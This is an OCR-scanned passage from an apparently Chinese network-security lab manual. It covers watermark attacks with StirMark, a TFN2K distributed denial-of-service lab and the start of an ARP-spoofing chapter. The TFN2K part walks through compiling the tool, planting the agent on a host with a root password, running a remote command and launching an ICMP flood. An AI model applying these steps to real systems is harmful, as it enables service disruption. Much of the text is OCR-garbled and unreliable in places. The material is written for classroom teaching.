操作 。StirMark 还 通过 一 个 传递 函数 的 应 用 ,模拟 非 线 性 的 A/D 转换 器 的 缺陷 所 带 来 的 
误差 ,这 通常 见于 扫描 仪 或 显示 设备 。 

7. 马赛 克 攻 击 

马赛 克 攻击 方法 首先 把 图 像 分 割 成 许多 个 小 图 像 ,然后 将 每 个 小 图 像 放 在 HTML 页 
面 上 拼凑 成 一 个 完整 的 图 像 。 一 般 的 Web 浏览 器 都 可 以 在 组 织 这 幅 图 像 时 在 图 像 中 间 不 
留任 何 缝隙 ,并 且 使 这 些 图 像 的 整体 效果 看 起 来 和 原 图 一 样 , 从 而 使 得 探测 器 无 法 从 中 检测 
到 侵权 行为 。 这 种 攻击 方法 主要 用 于 对 付 在 Internet 上 开发 的 自动 侵权 探测 器 ,该 探测 器 
包括 一 个 数字 水 印 系 统 和 一 个 Web 仆 行 者 。 这 一 攻击 方法 的 弱点 在 于 ,一 旦 数字 水 印 系统 
要 求 的 图 像 最 小 尺寸 较 小 , 则 需要 分 割 成 非常 多 的 小 图 像 , 这 样 将 使 生成 页 面 操作 非常 

8. 跳跃 攻击 

跳跃 攻击 主要 用 于 对 音频 信号 数字 水 印 系统 的 攻击 ,其 一 般 实现 方法 是 在 音频 信号 上 
加 入 一 个 跳跃 信号 , 即 首 先 将 信号 数据 分 成 500 个 采样 点 为 一 个 单位 的 数据 块 , 然 后 在 每 一 
数据 块 中 随机 复制 或 删除 一 个 采样 点 ,来 得 到 499 或 501 个 采样 点 的 数据 块 ,然后 将 数据 块 
按 原来 顺序 重新 组 合 起 来 。 实 验 表 明 , 这 种 改变 对 古典 音乐 信号 数据 也 几乎 感觉 不 到 ,但 是 
却 可 以 非常 有 效 地 阻止 水 印信 和 号 的 检测 定位 ,以 达到 难以 提取 水 印信 号 的 目的 。 类 似 的 方 
法 也 可 以 用 来 攻击 图 像 数据 的 数字 水 印 系 统 ,其 实现 方法 也 非常 简单 , 即 只 要 随机 地 删除 一 
定数 量 的 像素 列 , 然 后 用 另外 的 像素 列 补 齐 即 可 。 该 方法 虽然 简单 ,但 是 仍然 能 有 效 破 坏 水 
印信 号 存在 的 检验 。 


6.4 实验 内 容 


了 解 掌握 手动 攻击 .多 水 印 攻击 的 方法 ,练习 使 用 不 同 的 攻击 方法 攻击 LSB 和 Puff 等 
算法 工具 ,并 检测 、 对 比 这 些 攻击 方法 对 于 各 种 水 印加 密 算法 的 攻击 效果 。 


6.5 实验 步骤 


本 练习 主机 ABC 为 一 组 ,实验 角色 说 明 如 表 6-1 所 示 。 
表 6-1 实验 角色 说 明 


实验 主机 实验 角色 
主机 A 信息 发 送 者 
主机 也 水 印 攻击 者 
主机 C 信息 接收 者 
6.5.1 手动 攻击 


说 明 : 这 里 的 手动 攻击 是 一 种 模拟 攻击 方法 ,在 实际 应 用 中 可 能 不 会 采用 。 其 方法 是 
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在 水 印 图 片 中 随意 修改 一 小 段 代码 ,不 会 导致 影响 图 片 的 视觉 效果 ,然后 检测 算法 的 鲁 
棒 性 。 

CD 每 台 主 机 首先 使 用 LSB 工具 ,在 bmp 图 片 中 嵌入 水 印 。 

(2) 使 用 UltraEdit 打开 嵌入 水 印 后 的 图 片 ,任意 修改 其 中 的 若干 行 代码 ,然后 保存 。 

(3) 再 次 使 用 LSB 工具 提取 水 印 ,将 提取 结果 填 人 表 6-2 中 。 

(4) 使 用 UltraEdit 工具 打开 原始 水 印 文件 ,和 提取 出 的 水 印 文件 进行 对 比 ,查看 对 比 
结果 。 


6.5.2 多 水 印 攻击 


说 明 : 多 水 印 攻击 是 一 种 较为 简单 的 水 印 攻击 方法 , 它 主要 是 通过 在 一 张 已 经 有 水 印 
存在 的 图 片上 继续 添加 水 印 , 达 到 打 乱 图 像 内 水 印 数据 的 目的 ,使 得 利用 原 算 法 无 法 提取 水 
印 或 提取 的 水 印 不 完整 。 

在 本 实验 的 具体 应 用 中 ,对 于 LSB 或 DCT 算 法 ,都 可 以 进行 多 水 印 攻击 。 信 息 发 送 者 
先 在 一 张 BMP sk JPG 图 片 中 峙 入 水 印 文件 ( 既 可 以 是 图 片 也 可 以 是 文本 ) ,将 图 片 传 给 水 
印 攻击 者 。 水 印 攻击 者 根据 图 片 格式 选择 一 种 水 印 工具 ,然后 在 这 张 图 片 中 嵌入 水 印 攻击 
文件 ,将 图 片 传 给 信息 接收 者 。 信 息 接 收 者 接收 到 图 片 后 ,将 水 印 提取 出 来 。 结 果 很 可 能 是 
无 法 看 到 信息 发 送 者 所 典 入 的 水 印 。 

在 实际 应 用 中 ,对 于 一 张 图 片 , 即 使 它 已 经 嵌入 了 水 印 , 也 无 法 得 知 它 所 使 用 的 是 哪 一 
种 具体 算法 。 因 为 即使 是 LSB DCT 算法 ,它们 所 代表 的 也 都 是 一 大 类 算法 的 总 称 , 它 们 
下 面 的 具体 算法 会 有 所 不 同 ,所 以 多 水 印 攻击 对 于 不 同 的 情况 ,效果 可 能 会 有 所 不 同 。 

CD 主机 A、 主 机 B 和 主机 C 3 名 同学 协商 使 用 LSB 或 Puff 两 种 工具 中 的 一 种 做 
(2) 主机 A 使 用 选择 的 LSB 工具 或 Puff 工具 ,在 一 张 BMP ak JPG 图 片 中 嵌入 水 印 ， 
然后 传送 给 主机 B。 

(3) 这 里 主机 B 充当 水 印 攻击 者 , 它 根据 图 片 格式 选择 对 应 的 水 印 工具 ,然后 在 这 张 图 
片 中 嵌入 一 个 水 印 ,再 将 图 片 传 给 主机 C. 

(4) 主机 C 接 到 图 片 后 ,将 水 印 提取 出 来 ,将 结果 填 人 表 6-2 中 。 


表 6-2 不 同 攻击 方式 对 算法 工具 的 攻击 效果 


攻击 方式 攻击 对 象 (算法 工具 ) 攻击 结果 
手动 攻击 LSB 
多 水 印 攻击 LSB 
多 水 印 攻击 Puff 
6.5.3 自选 攻击 


(1) 需要 每 名 同学 从 实验 背景 知识 中 介绍 的 实验 水 印 攻击 手段 中 自选 3 种 ,分 别 检测 
它们 对 于 LSB 或 Puff 中 一 种 算法 的 攻击 效果 。 
(2) 检测 完成 后 , 按 要 求 填写 表 6-2 的 内 容 。 


6.5.4 Stirmark 自动 攻击 
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(1) 进入 StirMark 工作 目录 C:\ExpNIS\Encrypt-Lab\Tools\Watermark\StirMark， 


把 水 印 图 片 放 和 人 Media\Input\Images\Setl、Set2、Set3 中 任意 一 个 


目录 中 ,如 图 6. 1 所 示 。 


@@ C:\ExpNIS\Encrypt-Lab\ Tools\Watermark\ StirMark \Bin' 
RHO ”编辑 (E) BSW KEA TAD BW) 


> 搜索 O HK x ©) | 0 


rk\Bin Benchmark 


[修改 日 期 
EstrMark.exe 2 6 


432 KB ”应 用 程序 


图 6.1 


将 水 印 图 片 放 入 文件 目录 


dod 入 Bin\Benchmark 目录 下 运行 StirMark. exe 程序 ， 
了 多 种 形式 的 攻击 。Stirmark 攻击 过 程 如 图 6. 2 所 示 。 


StirMark BenchMark 4.8.129 


Starting Markbench test — Tue May 28 82.28.36 2013 


PATHS 
LIB: 


>> 
EnbedDLL.d11 
INI: SMBSettings.ini 
LOG: SMBReport<time>. log 
IMAGES >> 
--7../Media/Input/Images/Seti/pict. jpg 
TESTS >> 
Test_PSNR 
Test_EmbedT ime 
Test_AddNoise 
Test_JPEG 
Test_MedianCut 
Test. ConvFilter 
Test_SelfSimilarities 
Test_RemoveLines 
Test_Cropping 
Test_Rescale 
Test_Rotation 
Test_Rotat ionCrop 
Test_RotationScale 
Test_Affine 
Test SmallRandomDistortions 
Test. LatestSnallRandomDistortions 


Starting benchmark... 


‘Applying Test PSNR to [Images/Seti/pici.jpg] ... 


图 6.2 Stirmark 攻击 过 程 


,也 可 以 据 此 评估 一 


same 6. bei 


tirmark 就 开始 自动 对 水 印 


后 会 在 Benchmark 目录 下 生成 一 个 最 新 的 日 志文 件 , 通 过 查看 
个 算法 的 优 劣 。 


Stirmark 攻击 生成 的 日 
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[P SMBReportTue May 28 0: 


36 2013Jog - 记事 本 | 


文件 (E) 编辑 (E) 格式 (0) 查看 (W) EHH 


Test_AFF: 

Test Rffine 1 Inages/Seti/pici Certainty 142.224 NA 
Test_affine 2 Images/Set1/pict Certainty 135.165 NA 
Test_Affine 3 Images/Set1/pict Certainty 143.028 NA 
Test_Aaffine 4 Images/Set1/pic1 Certainty 138.92 NA 
Test_Affine 5 Images/Set1/pic1 Certainty 141.177 NA 
Test_Affine 6 Images/Set1/pict Certainty 141.067 NA 
Test_affine 7 Images/Set1/pict Certainty 141.266 NA 
Test Rffine 8 Images/Set1/pict Certainty 141.295 NA 


Test_SmallRandomDistortions -- Tue May 28 62.41.47 2013 
Test_SmallRandomDistortions Images/Set1/pict Certainty 
139.471 14.6663 dB 

Test SnallRandonDistortions 1 Images/Set1/pict Certainty 
139.305 14.4963 dB 

Test SmallRandonDistortions 1.05 Images/Set1/pict Certainty 
139.137 14.3236 dB 

Test SmallRandonDistortions 1.1 Images/Set1/pict Certainty 
138.97 15.169 dB 


Test LatestSmallRandomDistortions -- Tue May 28 62.42.57 2013 


图 6.3 Stirmark 攻击 生成 的 日 志文 件 


(4) Stirmark 攻击 完成 后 会 在 Media\Output\Images\ 目 录 对 应 的 SetX 下 产生 经 过 攻 
击 的 各 个 图 像 。 任 选 其 中 几 个 ,尝试 提取 水 印 ,然后 总 结 这 一 水 印 算法 的 鲁 棒 性 。 经 过 攻击 


Ji BY FN f 


0 图 6. 4 所 示 。 


Lena AFFINE 2b lena AFFINE 3b Lena AFFINE 4b lena AFFINE 5.b Lena AFFINE 6b — Lena AFFINE 7.b — Lena AFFINE 8.b 
mp mp mp mp mp mp mp 


w A 


^ a 


Lena CONV 1bm Lena CONV 2bm Lena CROP lbm Lena CROP 2bm Lena CROP_S.bm Lena CROP_10.b Lena CROP 15b Lena CROP 20b 


p 


Lena CROP 25b 


Lena CROP 50b — Lena CROP 75b 


图 6.4 经 过 攻击 后 的 图 像 
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6.6 思考 问题 


l. 有 没有 和 鲁 棒 性 更 强 的 算法 ? 自己 查找 一 下 ,或 者 打开 Photoshop 里 的 Digimare 控 
件 ,用 它 来 诅 入 水 印 , 并 进行 水 印 攻击 。 试 试 它 的 鲁 棒 性 。 

2. 如 何 检测 一 个 文本 一 幅 图 像 中 是 否 隐 藏 有 秘密 信息 ? 

3. 如 何 证 明 提 取 后 的 信息 就 是 嵌入 的 隐藏 信息 ? 

4. 数字 水 印 技术 在 移动 终端 中 有 哪些 应 用 ? 
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7.1 实验 目的 与 要 求 


。 通过 分 析 攻 击 程序 的 源 代 码 ,理解 DDoS 攻击 的 原理 及 实施 过 程 。 
。 掌握 使 用 DDoS 工具 对 目标 主机 进行 攻击 的 方法 。 


7.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 及 Linux, 在 交换 网 络 结构 下 ,每 组 
3 人 ,使 用 TFN2K 软件 。 


7.3 背景 知识 


7.3.1 DoS 攻击 


拒绝 服务 (Denial of Service,DoS) 攻 击 相当 于 火车 满载 的 时 候 不 能 再 让 乘客 进入 一 样 。 
造成 DoS 的 攻击 行为 被 称 为 DoS 攻击 ,其 目的 是 使 计算 机 或 网 络 无 法 提供 正常 的 服务 。 从 
网 络 攻击 的 各 种 方法 和 所 产生 的 破坏 情况 来 看 ,DoS 算是 一 种 很 简单 但 又 很 有 效 的 进攻 方 
式 , 用 超出 被 攻击 目标 处 理 能 力 的 海量 数据 包 消 耗 可 用 系统 和 带宽 资源 ,最 终 只 是 网 络 服务 
瘫痪 的 一 种 攻击 手段 。 

最 常见 的 DoS 攻击 有 计算 机 网 络 带 宽 攻击 和 连通 性 攻击 。 带 宽 攻 击 指 以 极 大 的 通信 
量 冲击 网 络 ,使 得 所 有 可 用 网 络 资源 都 被 消耗 列 尽 ,最 后 致使 合法 的 用 户 请 求 无 法 通过 。 连 
通 性 攻击 指 用 大 量 的 连接 请 求 冲击 计算 机 ,使 得 所 有 可 用 的 操作 系统 资源 都 被 消耗 殖 尽 ,最 
终 计 算 机 无 法 再 处 理 合法 用 户 的 请 求 。 


7.3.2 DDoS 攻击 


分 布 式 拒绝 服务 (Distributed Denial of Service,DDoS) 攻 击 指 借助 于 客户 机 /服务 器 技 
术 , 将 多 个 计算 机 联合 起 来 作为 攻击 平台 ,对 一 个 或 多 个 目标 发 动 DoS 攻击 ,从 而 成 倍 地 提 
高 拒绝 服务 攻击 的 威力 。 分 布 式 拒绝 服务 攻击 进行 时 ,攻击 者 需要 先 控 制 大 量 的 主机 ,被 攻 
击 者 控制 的 主机 数量 越 多 ,带宽 越 宽 ,对 目标 主机 的 攻击 危害 就 越 大 。 

对 受害 者 来 说 ,DDoS 的 实际 攻击 包 是 从 代理 端 上 发 出 的 , 主 控 端 只 发 送 命令 而 不 参与 
实际 攻击 。 攻 击 者 在 得 到 主 控 端 和 代理 端的 控制 权 后 ,会 把 相应 的 DDoS 程序 上 传 , 这 些 程 
序 可 以 协调 分 散在 互联 网 各 处 的 计算 机 共同 完成 对 一 台 主 机 的 攻击 ,从 而 使 主机 遭 到 来 自 
不 同 地 方 的 许多 主机 的 攻击 。 

之 所 以 攻击 者 不 去 直接 控制 代理 端 ,而 要 由 主 控 端 发 出 攻击 命令 ,是 为 了 确保 攻击 者 的 
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安全 。 一旦 攻击 者 发 出 指令 ,就 可 以 断 开 与 主 控 端的 连接 , 转 而 由 主 控 端 指挥 代理 端 发 起 攻 
击 ,这 样 从 主 控 端 再 找到 攻击 者 的 可 能 性 就 大 大 降低 了 。 

从 图 7.1 可 以 看 出 ,DDoS 攻击 分 为 3 层 : 攻击 者 、 主 控 端 . 代 理 端 ,三 者 在 攻击 中 扮演 
着 不 同 的 角色 。 


主 控 端 ”代理 端 
图 7.1 DDoS 攻击 角色 


7.3.3 TFN2K 简介 


TFN2K 是 由 德国 著名 黑客 Mixter 编写 的 分 布 式 拒绝 服务 攻击 工具 ,是 同类 攻击 工具 
TEN 的 后 续 版 本 。 

TFN2K 通过 主 控 端 利用 大 量 代 理 端 主机 的 资源 进行 对 一 个 或 多 个 目标 的 协同 攻击 。 
当前 互联 网 中 的 UNIX, Solaris 和 Windows NT 等 平台 的 主机 能 被 用 于 此 类 攻击 ,而 且 这 
个 工具 非常 容易 被 移植 到 其 他 系统 平台 上 。 

TFN2K 由 两 部 分 组 成 : 在 主 控 端 主机 上 的 客户 端 和 在 代理 端 主机 上 的 守护 进程 。 主 
控 端 向 其 代理 端 发 送 攻击 指定 的 目标 主机 列表 。 代 理 端 据 此 对 目标 进行 拒绝 服务 攻击 。 由 
一 个 主 控 端 控制 的 多 个 代理 端 主机 ,能 够 在 攻击 过 程 中 相互 协同 ,保证 攻击 的 连续 性 。 主 控 
端 和 代理 端的 网 络 通信 是 经 过 加 密 的 ,还 可 能 混杂 了 许多 虚假 数据 包 。 整 个 TFN2K 网 络 
可 能 使 用 不 同 的 TCP、UDP 或 ICMP 包 进 行 通 信 , 而 且 主 控 端 还 能 伪造 其 IP 地址。 所 有 这 
些 特 性 都 使 发 展 防御 TFN2K 攻击 的 策略 和 技术 都 非常 困难 或 效率 低下 。 

TFN2K 的 技术 主要 有 以 下 几 个 方面 : 

CD 主 控 端 通过 TCP、UDP、ICMP 或 随机 性 使 用 其 中 之 一 的 数据 包 向 代理 端 主机 发 送 
命令 。 对 目标 的 攻击 方法 包括 TCP/SYN, UDP, ICMP/PING 或 BROADCAST PING 
(SMURF) 数 据 包 flood 等 。 

(2) 主 控 端 与 代理 端 之 间 数 据 包 的 头 信 息 也 是 随机 的 ,除了 ICMP 总 是 使 用 ICMP_ 
ECHOREPLY 类 型 数据 包 。 

(3) 与 其 上 一 代 版 本 TFN 不 同 ,TFN2K 的 守护 程序 是 完全 沉默 的 , 它 不 会 对 接收 到 的 
命令 有 任何 回应 。 客 户 端 重复 发 送 每 一 个 命令 20 次 ,并 且 认 为 守护 程序 应 该 至 少 能 接收 到 
其 中 二 个。 


7.3.4 TFN2K 使 用 方法 


TFN2K 命令 格式 : 
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usage: ./tfn« options» 
TFN2K 命令 选项 及 说 明 见 表 7-1. 
表 7-1 TFN2K 命令 选项 


命令 选项 说 明 
[-P protocol] 主 控 端 与 代理 端 通信 协议 ,可 以 是 ICMP,UDP 和 TCP。 默 认 随 机 选择 
[-S host/ip] DDoS 攻击 源 IP 地 址 。 默 认 随机 生成 
(+f hostlist] 代理 端 主机 名 称 或 IP 地 址 列表 文件 
[-h hostname] 指定 单个 代理 端 主机 
[i target] 包含 攻击 选项 /攻击 目标 
[p port] TCP SYN floods 攻击 端口 

0- 停 止 攻击 
2- 改 变 攻 击 数据 包 大 小 
: 4-UDP 洪水 攻击 
—-c com id> 5-TCP/SYN 洪水 攻击 
6-ICMP/PING 洪水 攻击 
10- 代 理 端 执行 shell 命令 


7.4 实验 内 容 


假设 黑客 已 攻 下 主 控 端 主机 ,利用 主 控 端 主机 取得 了 代理 端 主机 的 一 定 权 限 , 用 主 控 端 
主机 操控 代理 端 主机 攻击 受害 者 主机 。 


7.5 实验 步骤 


本 练习 主机 A、B、C 为 一 组 ,实验 角色 说 明 如 表 7-2 所 示 。 
表 7-2 实验 角色 说 明 


m 


实验 主机 实验 角色 系统 环境 
A 主 控 端 Linux 
B 代理 端 Linux 
e 受害 者 Windows 


7.5.1 编译 生成 执行 文件 


TFN2K 主 控 端 和 代理 端的 网 络 通信 是 经 过 加 密 的 ,使 用 的 是 AES(Advanced 
Encryption Standard) 对 称 加 密 算 法 ,作为 加 、 解 密 双 方 都 需要 知道 密 钥 ,加密 方 使 用 密 钥 对 
信息 进行 加 密 , 解 密 方 使 用 密 钥 对 信息 进行 解密 。 在 TFN2K 中 ,作为 下 发 控制 命令 的 主 控 
端 利用 密 钥 对 发 送信 息 进行 加 密 , 作 为 接收 命令 的 代理 端 利用 密 钥 对 接收 信息 进行 解密 ,并 
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执行 命令 。 与 此 同时 ,代理 端 可 通过 密 钥 确 定 主 控 端的 身份 。 

要 选择 一 个 最 合适 、 最 安全 的 时 机 通告 主 控 端 和 代理 端 加 密 通信 所 使 用 的 密 钥 ,而 
TFN2K 将 这 个 时 机 选择 在 对 源码 进行 编译 .生成 执行 文件 的 过 程 中 。 作 为 被 固化 到 程序 
内 部 的 密 钥 ,很 难 从 外 部 获取 到 它 。 

因此 ,需要 从 编译 ,安装 TFN2K 入 手 ,期 间 录入 通信 密 钥 。 

主 控 端 单 击 平台 工具 栏 “ 控 制 台 ”按钮 ,进入 实验 目录 ,依次 进行 下 列 操作 : 

(1) 解压 缩 tfn2k 源码 安装 包 , 得 到 新 目录 tin2k, MIA 7. 2 所 示 。 


XO 编辑 EE) mE) SHO FEO WB 
[root@ExpNIS ddos]# tar -zxvf tfn2k. tgz 
tfn2k/ 

tfn2k/src/ 

tfn2k/src/tfn. c 

tfn2k/src/base64. c 

tfn2k/src/process. c 

tfn2k/src/aes.h 
tfn2k/src/td. c 
tfn2k/src/config.h 
tfn2k/src/tribe.h 
tfn2k/src/tribe.c 
tfn2k/src/disc.c 
tfn2k/src/cast. c 
tfn2k/src/ip.c 
tfn2k/src/aes.c 
tfn2k/src/flood. c 
tfn2k/src/ip.h 
tfn2k/src/Makefile 
tfn2k/src/mkpass. c 
tfn2k/README 
tfn2k/Makefile 
[root@ExpNIS ddos]& 


图 7.2 解压 缩 tfn2k 源码 安装 包 


(2) 切换 到 tfn2k 目录 , 源 文件 在 sec 目录 中 ,如 图 7. 3 所 示 。 


[rooteE 
[rooteFE 


S ddos]# cd tfn2k 
S tfn2k]& 


图 7.3 切换 目录 


(3) 编译 源 文件 ,输入 y 表 示 同 意 声 明 , 如 图 7.4 所 示 。 


[root(ExpNIS tfn2k]# make 

cd src && make 

make[1]: Entering directory '/opt/ExpNIS/NetAD-Lab/Tool s/ddos/t fn2k/ src" 

gcc -Wall -03 disc.c -o disc 

disc.c: 在 函数 fain’ tp: 

disc. c 警告 ， 隐 式 声 明 函 数 “&xit* 

ee 和 警告 : 隐 式 声 明 与 内 建 函数 sxit” 不 兼容 

- /disc 

This program is distributed for educational purposes and without any 
explicit or implicit warranty; in no event shall the author or contributors 
be liable for any direct, indirect or incidental damages arising in any way 
out of the use of this software. 


I hereby certify that I will not hold the author liable for any wanted 
or unwanted effects caused by this program and that I will give the author 
full credit and exclusively use this program for educational purposes. 


Do you agree to this disclaimer [y/n]? y 


图 7.4 编译 源 文件 
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(4) 输入 通信 密 钥 12345678 ,该 密 钥 可 任意 ,生成 执行 文件 tfn、td, 如 图 7.5 所 示 。 


: 隐 式 声明 与 内 建 函 数 “exit” 不 兼容 


tfn.c: 

tfn.c: fn sendto' 中 : 

tfn. c:267: 式 声 明 与 内 建 函 数 “strcpy” 不 兼容 
tfn.c: 'strcpy” 不 兼容 
tfn. c 


tfn.c:313: 警告 ， 隐 式 声 明 与 内 建 函 数 “exit” 不 兼容 

gcc -Wall -03 pass.o aes.o base64.o cast.o ip.o tribe.o tfn.o -o tfn 
strip tfn 

make[1]: Leaving directory“/opt/ExpNISVNetAD-Lab/Tools/ddos/tfn2k/src” 
cp src/td src/tfn . 

[root(ExpNIS tfn2k]# B 


图 7.5 生成 执行 文件 


tfn 是 主 控 端 程序 ,通过 此 程序 对 代理 端 加 密 、 下 发 攻击 命令 ;td 是 代理 端 程序 ,负责 解 
密 、 接 收 攻击 命令 ,并 对 目标 主机 发 起 攻击 。 


7.5.2 TFN2K 攻击 


(1) 主 控 端 将 代理 端 程序 植 人 代理 端 主机 ,这 里 使 用 scp 命令 通过 远程 复制 操作 来 模 
拟 植 和 人 过 程 ,命令 如 图 7.6 所 示 。 

注 : 代理 端 主机 SSH 服务 (为 scp 提供 服务 ) 默 认 是 关闭 的 ,执行 命令 service sshd 
start 开启 SSH IRF. 


[root@ExpNIS tfn2k]# scp td root@172. 16. 0. 55:/root 

The authenticity of host '172.16.0.55 (172. 16. 0. 55) can’t be established 
RSA key fingerprint is 57:61:cd:cf:10:13:17:4b:a0:75:bd:54:1f:6d:b2:89. 
Are you sure you want to continue connecting (yes/no)? y 

Please type 'yes' or 'no': yes 

Warning: Permanently added “172. 16. 0. 55” (RSA) to the list of known hosts 
Read from socket failed: Connection reset by peer 

lost connection 


图 7.6 代理 端 程序 植 人 代理 端 主机 


在 执行 过 程 中 要 求 输入 代理 端 主机 root 用 户 的 登录 口令 ,口令 为 jlcssadmin, 如 图 7.7 
所 示 。 


[root@ExpNIS tfn2k]# scp td root@172. 16. 0. 55:/root 
root@172. 16. 0. 55' s password: 


td 100% 31KB 31.4KB/s 00:00 
[root@ExpNIS tfn2k]# Bi 


图 7.7 输入 口令 


(2) 代理 端 查看 /root 目录 ,确定 td 代理 程序 已 被 植 人 。 和 运行 td 程序 (td 代理 程序 会 
运行 于 后 台 ,监听 来 自主 控 端 的 命令 ,并 准备 对 目标 主机 发 起 攻击 )。 查 看 目录 如 图 7.8 
所 示 。 


[root@ExpNIS ddos]# 1s -1 


计 140 
-rw-r 1 root root 0 2008-07-29 hosts. txt 
-rwxr-xr-x l root root 107777 2008-07-23 smurt2 
-rwx---—- l root root 26936 2008-07-29 tfn2k. tgz 


图 7.8 查看 /root 目录 
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(3) 主 控 端 建立 代理 记录 文件 ,并 将 代理 主机 加 入 。 具 体 命令 如 图 7.9 所 示 。 


[root@ExpNIS tfn2k]# touch host 
[root@ExpNIS tfn2k]& echo 172. 16.0.55>>host 
[root@ExpNIS tfn2k]& 


图 7.9 建立 代理 记录 文件 


n 


(4) 主 控 端 与 代理 端 连接 测试 , 主 控 端 使 用 tfn 命令 (参见 实验 原理 五 ) 进 行 测试 , 命 
如 图 7.10 所 示 。 


[rooteExpNIS tfn2k]# ./tfn -f host -c 10 -i "mkdir test” 


Protocol : random 

Source IP : random 

Client input : list 

Command : execute remote command 


Password verification: 


Sending out packets: . 
[root@ExpNIS tfn2k]& 


图 7.10 主 控 端 使 用 tfn 命令 进行 测试 


解释 命令 : 

(5) 代理 机 查看 是 否 建立 test 目录 (默认 与 td 同 目录 )。 在 确定 主 控 端 与 代理 端 通信 
正常 的 情况 下 ,开始 对 目标 主机 进行 攻击 。 

(6) 受害 者 主机 打开 任务 管理 器 ,实时 观察 CPU ,内 存 使 用 消耗 情况 。 

(7) 代理 端 监 听 通 信 命 令 。 

代理 端 进 入 snort 所 在 目录 /opt/ExpNIS/NetAD-Lab/Tools/ids, 执 行 snort 监听 目的 
IP 为 本 机 的 网 络 数据 包 ,snort 执行 命令 如 图 7. 11 所 示 。 


[root@ExpNIS ddos]# cd /opt/ExpNIS/NetAD-Lab/Tool s/ids 
[rootüExpNIS ids]# ./snort -dev dst 172. 16. 0. 55 
Running in packet dump mode 

Log directory = /var/log/snort 


Initializing Network Interface eth0 


---- Initializing Snort ==-- 
Initializing Output Plugins! 
Decoding Ethernet on interface eth0 


一 == Initialization Complete == 一 


—*» Snort! 《站 

Version 2.0.0 (Build 72) 

By Martin Roesch (roesch@sourcefire. com, www. snort. org) 
06/14-16:42:52. 215993 ARP who-has 172. 16. 0. 55 tell 172. 16. 0. 40 


图 7.11 代理 端 监听 网 络 数据 包 


(8) 主 控 端 向 代理 端 下 发 攻击 指令 。 具 体操 作 图 7.12 所 示 。 


解释 命令 : 8 
(9) 代理 端 观察 snort 监听 信息 ,确定 主 控 与 代理 间 是 否 为 密 文 通信 ,监听 信息 如 图 7. 13 
所 示 。 


(10) 停止 攻击 , 主 控 端 输 入 命令 ,如 图 7. 14 所 示 。 
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[root@ExpNIS tfn2k]# . /tfn -f host -c 6 -i 172.16.0.78 


Protocol : random 

Source IP : random 

Client input : list 

Target (s) : 172. 16. 0. 78 

Command : commence icmp echo flood 


Password verification: 


Sending out packets: . 


图 7.12 主 控 端 向 代理 端 下 发 攻击 指令 


一 站 》 Snort! <+- 

Version 2.0.0 (Build 72) 

By Martin Roesch (roesch@sourcefire. com, wvv. snort. org) 

06/14- 16:42:52. 215993 ARP who-has 172. 16. 0. 55 tell 172. 16. 0. 40 


Short UDP packet, length field > payload length 

06/14 16:42:52. 227594 0:C:29:36:F1:12 -> 0:C:29:C2:47:34 type:0x800 le 
15. 62. 94.0:0 -> 172. 16. 0. 55:0 UDP TTL:208 TOS:0x0 ID:65448 IpLen:20 Dg 
C9 D2 30 9E 00 33 EO 87 46 5A 38 GF 6D GF 53 58 ..0..3..FZ80moSX 

73 6C 70 64 51 2B 51 47 53 54 78 51 48 41 41 41 slpdQ+QGSTxQHAAA 

41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 


= 本 本 本 本 本 本 本 村 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 二 


TCP Data Offset (0) < hlen (0) 

06/14-16:42:52. 235131 0:C:29:36:F1:12 -> 0:C:29:C2:47:34 type:0x800 le 
15. 62. 94.0:0 -> 172. 16. 0. 55:0 TCP TTL:249 TOS:0x0 ID:35482 TL en:20 Dg 
EO El 6D 53 00 00 00 00 00 9C 49 BF 00 10 BO 4F .. mS.. 
92 08 00 00 46 5A 38 6F 6D 6F 53 58 73 6C 70 64 ....FZ si 
51 2B 51 47 53 54 78 51 48 41 41 41 41 41 41 41 Q+QGSTxQHAAAAAAA 
41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAA 


图 7.13 监听 信息 


[root@ExpNIS tfn2k]# ./tfn -f host -c 0 


Protocol : random 
Source IP : random 
Client input : list 

Command : stop flooding 


Password verification: 


Sending out packets: . 
[root@ExpNIS tfn2k]& 


图 7.14 停止 攻击 


7.6 思考 问题 


能 够 防范 TFN2K 攻击 的 方法 都 有 哪些 ? 

如 何 防范 针对 DNS 的 DDoS 攻击 ? 

防火 墙 和 入 侵 检测 系统 能 否 防范 DDoS 攻击 ? 

既然 P2P 能 够 显著 提高 数据 下 载 的 速率 , 那 它 是 否 可 以 用 来 进行 DDoS 攻击 ? 

DoS 攻击 和 DDoS 攻击 一 般 是 针对 服务 器 发 动 攻击 ,而 对 PC 攻击 没有 多 大 意义 ,你 
道 这 是 为 什么 吗 ? 
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第 8 章 ARP 欺骗 攻击 
8.1 实验 目的 与 要 求 


掌握 ARP 协议 工作 的 原理 。 
理解 ARP 欺骗 攻击 的 原理 。 
掌握 ARP 欺骗 攻击 全 过 程 。 
学 会 ARP 欺骗 的 防御 技术 。 


8.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 及 Linux(Fedro) ,在 交换 网 络 结构 
下 ,每 组 3 人 ,使 用 ARPattack 和 UdpTools TH. 


8.3 背景 知识 
8.3.1 ARP 协议 


网 络 传输 中 IP 数据 包 通过 以 太 网 发 送 ,以 太 网 设备 并 不 能 识别 32 位 IP 地 址 ,它们 是 
以 48 位 以 太 网 地 址 传输 以 太 网 数据 包 的 。 因 此 ,IP 驱动 器 必须 把 IP 目的 地 址 转换 成 以 太 
网 目的 地 址 。 在 这 两 种 地 址 之 间 存 在 着 某 种 静态 的 或 算法 的 映射 ,常常 需要 查看 一 张 表 。 
地 址 解析 协议 (Address Resolution Protocol, ARP) 就 是 用 来 确定 这 些 映 像 的 协议 。 

ARP 工作 时 ,发 送出 一 个 含有 所 希望 的 IP 地 址 的 以 太 网 广播 数据 包 。 目 的 主机 或 另 
一 个 代表 该 主机 的 系统 ,以 一 个 含有 IP 和 以 太 网 地 址 对 的 数据 包 作 为 应 答 。 发 送 者 将 这 个 
地 址 对 高 速 缓 存 起 来 ,以 节约 不 必要 的 ARP 通信 。 

如 果 有 一 个 不 被 信任 的 节点 对 本 地 网 络 具 有 写 访问 许可 权 , 那 么 也 会 有 某 种 风险 。 这 
样 一 台 机 器 可 以 发 布 虚假 的 ARP 报 文 并 将 所 有 通信 都 转向 它 自 己 , 然 后 它 就 可 以 扮演 某 
